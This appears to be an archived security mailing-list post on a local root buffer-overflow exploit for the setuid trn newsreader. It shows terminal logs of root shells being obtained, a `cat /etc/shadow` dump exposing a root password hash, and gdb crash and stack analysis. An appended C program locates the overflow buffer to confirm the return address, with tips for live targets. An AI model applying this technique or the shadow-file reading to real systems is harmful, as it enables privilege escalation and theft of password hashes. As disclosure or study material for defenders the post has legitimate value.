Message-ID: <BAY18-F1580819117F440A622C5E6CF870@phx.gbl>
From: zzagorrzzagorr at hotmail.com (Z z a g o r R)
Subject: /usr/bin/trn local root exploit
/*
---------------------------------------
TEST MANDRAKE 9.2
sh-2.05b# cat /proc/version
Linux version 2.4.22-10mdk (nplanel@...mandrakesoft.com) (gcc version 3.3.1 (Mandrake Linux 9.2 3.3.1-2mdk)) #1 Thu Sep 18 12:30:58 CEST 2003
sh-2.05b# rpm -qa trn
trn-3.6-17mdk
sh-2.05b# chmod +s /usr/bin/trn
chmod +s /usr/bin/trn
sh-2.05b#
sh-2.05b# ls -al /usr/bin/trn
ls -al /usr/bin/trn
-rwsr-sr-x 1 root root 233624 Jan 10 2003 /usr/bin/trn
sh-2.05b# exit
sh-2.05b$ ./trn 0xbfffff96
sh-2.05b# id
uid=0(root) gid=4294967295 groups=4294967295
sh-2.05b#
sh-2.05b# cat /etc/shadow
cat /etc/shadow
root:$1$HC7/pHcz$L0w/RpmeVEF9Xbnf7iHjv/:12554:0:99999:7:::
....
---------------------------------------
TEST SLACKWARE 10.0.0 (not suid)
bash-2.05b$ cat /etc/slackware-version
Slackware 10.0.0
bash-2.05b$ cat /proc/version
Linux version 2.4.26 (root@...t) (gcc version 3.3.4) #2 Mon Jun 14 19:05:05 PDT 2004
bash-2.05b$ uname -a
Linux nyg 2.4.26 #2 Mon Jun 14 19:05:05 PDT 2004 i686 unknown unknown GNU/Linux
bash-2.05b$ ./a 0xbfffff98
sh-2.05b$
----------------------------------------
TEST SLACKWARE 9.1.0
sh-2.05b$ ./trn 0xbfffff84
./trn 0xbfffff84
sh-2.05b#
sh-2.05b# id
id
uid=0(root) gid=98(nobody) groups=98(nobody)
*/
/*
RETADDR? (mandrake...)
sh-2.05b$ gdb ./trn
gdb ./trn
GNU gdb 5.3-25mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu"...
(no debugging symbols found)...
(gdb)
(gdb) r `perl -e 'print "A" x 156'` --------->BUFFER=>156
(gdb) r `perl -e 'print "A" x 156'`
Starting program: /usr/bin/trn `perl -e 'print "A" x 156'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x0805ad05 in strcpy ()
(gdb) i r
eax 0x0 0
ecx 0x8087244 134771268
edx 0xbffff850 -1073743792
ebx 0x41414141 1094795585
esp 0xbffff931 0xbffff931
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x805ad05 0x805ad05
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
mxcsr 0x1f80 8064
orig_eax 0xffffffff -1
(gdb) x/1000x $esp
0xbffff931: 0x2c080872 0x01bfffff 0x01000000 0x41000000
... (the intervening dump lines and gdb pager prompts are omitted in the post) ...
0xbffffef1: 0x0effffff 0xff000000 0x0fffffff 0x1a000000
0xbfffff01: 0x00bfffff 0x00000000 0x00000000 0x00000000
0xbfffff11: 0x00000000 0x00000000 0x38366900 0x752f0036
0xbfffff21: 0x622f7273 0x742f6e69 0x41006e72 0x41414141
0xbfffff31: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffff41: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffff51: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffff61: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffff71: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffff81: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffff91: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffa1: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffb1: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffc1: 0x41414141 0x00414141 0x622f3d5f 0x732f6e69
0xbfffffd1: 0x57500068 0x752f3d44 0x622f7273 0x48006e69
0xbfffffe1: 0x3d454d4f 0x4853002f 0x3d4c564c 0x752f0031
0xbffffff1: 0x622f7273 0x742f6e69 0x00006e72 Cannot access memory at address 0xbffffffd
(gdb)
*/
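The gdb dump above is where the return address comes from: argv[0] ("/usr/bin/trn") ends at 0xbfffff2b, the 156 "A" bytes of argv[1] occupy 0xbfffff2c through 0xbfffffc7, and the environment strings follow. The value the post passes on Mandrake 9.2, 0xbfffff96, falls inside that argument buffer. The following C program is an added example, not code from the post or from trn: it parses the `x/1000x $esp` lines exactly as gdb prints them (little-endian 32-bit words, with the trailing "Cannot access memory" message), finds the longest run of 0x41 bytes, and checks whether a candidate return address lands in it. The dump lines are copied from the post into a constructed array; the post's own exploit source is not on this page, so nothing here reproduces its payload layout.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample: the last lines of the `x/1000x $esp` dump quoted in
 * the post, including gdb's trailing "Cannot access memory" message. */
static const char *stack_dump[] = {
    "0xbfffff11: 0x00000000 0x00000000 0x38366900 0x752f0036",
    "0xbfffff21: 0x622f7273 0x742f6e69 0x41006e72 0x41414141",
    "0xbfffff31: 0x41414141 0x41414141 0x41414141 0x41414141",
    "0xbfffff41: 0x41414141 0x41414141 0x41414141 0x41414141",
    "0xbfffff51: 0x41414141 0x41414141 0x41414141 0x41414141",
    "0xbfffff61: 0x41414141 0x41414141 0x41414141 0x41414141",
    "0xbfffff71: 0x41414141 0x41414141 0x41414141 0x41414141",
    "0xbfffff81: 0x41414141 0x41414141 0x41414141 0x41414141",
    "0xbfffff91: 0x41414141 0x41414141 0x41414141 0x41414141",
    "0xbfffffa1: 0x41414141 0x41414141 0x41414141 0x41414141",
    "0xbfffffb1: 0x41414141 0x41414141 0x41414141 0x41414141",
    "0xbfffffc1: 0x41414141 0x00414141 0x622f3d5f 0x732f6e69",
    "0xbfffffd1: 0x57500068 0x752f3d44 0x622f7273 0x48006e69",
    "0xbfffffe1: 0x3d454d4f 0x4853002f 0x3d4c564c 0x752f0031",
    "0xbffffff1: 0x622f7273 0x742f6e69 0x00006e72 Cannot access memory at address 0xbffffffd",
};
static const size_t stack_dump_lines = sizeof stack_dump / sizeof stack_dump[0];

struct byte_run { uint32_t start; size_t len; };

/* Decode one "ADDR: WORD WORD ..." line. gdb prints each 32-bit word in host
 * (little-endian) order, so byte i of the word at address A lives at A+i.
 * Returns the number of bytes written to out; stops at the first token that is
 * not a 0x-prefixed word (for example gdb's "Cannot access memory" trailer). */
static size_t decode_dump_line(const char *line, uint32_t *base, uint8_t *out, size_t cap)
{
    char *p;
    unsigned long addr = strtoul(line, &p, 16);
    if (*p != ':')
        return 0;
    p++;
    size_t n = 0;
    while (n + 4 <= cap) {
        while (*p == ' ')
            p++;
        if (p[0] != '0' || p[1] != 'x')
            break;
        char *next;
        unsigned long w = strtoul(p, &next, 16);
        for (int i = 0; i < 4; i++)
            out[n++] = (uint8_t)(w >> (8 * i));
        p = next;
    }
    *base = (uint32_t)addr;
    return n;
}

/* Longest contiguous run of `value` bytes across the dump. A run continues
 * from one line to the next only when the addresses are contiguous. */
static struct byte_run longest_byte_run(const char **lines, size_t nlines, uint8_t value)
{
    struct byte_run best = {0, 0}, cur = {0, 0};
    uint32_t expect = 0;
    for (size_t l = 0; l < nlines; l++) {
        uint8_t bytes[16];
        uint32_t base;
        size_t n = decode_dump_line(lines[l], &base, bytes, sizeof bytes);
        if (l > 0 && base != expect)
            cur.len = 0;            /* gap in the dump: the run cannot continue */
        for (size_t i = 0; i < n; i++) {
            if (bytes[i] == value) {
                if (cur.len == 0)
                    cur.start = base + (uint32_t)i;
                cur.len++;
                if (cur.len > best.len)
                    best = cur;
            } else {
                cur.len = 0;
            }
        }
        expect = base + (uint32_t)n;
    }
    return best;
}

/* True when addr lies inside the run [start, start+len). */
static int addr_in_run(struct byte_run r, uint32_t addr)
{
    return r.len > 0 && addr >= r.start && addr - r.start < r.len;
}

int main(void)
{
    struct byte_run r = longest_byte_run(stack_dump, stack_dump_lines, 0x41);
    printf("argv[1] 'A' run: start=0x%08x len=%zu end=0x%08x\n",
           r.start, r.len, r.start + (uint32_t)r.len - 1);
    uint32_t ret = 0xbfffff96;      /* the value the post passes on Mandrake 9.2 */
    printf("0x%08x is %s the run (offset %ld)\n", ret,
           addr_in_run(r, ret) ? "inside" : "outside", (long)(ret - r.start));
    return 0;
}
```

The run it recovers is 156 bytes long, matching the `"A" x 156` argument the post fed to gdb, and 0xbfffff96 sits 106 bytes into it. The same parsing works on any `x/Nx` dump; when doing this against a live target, remember that the addresses shift with the length of argv[0] and the environment, which is why the post reports a different value on each distribution.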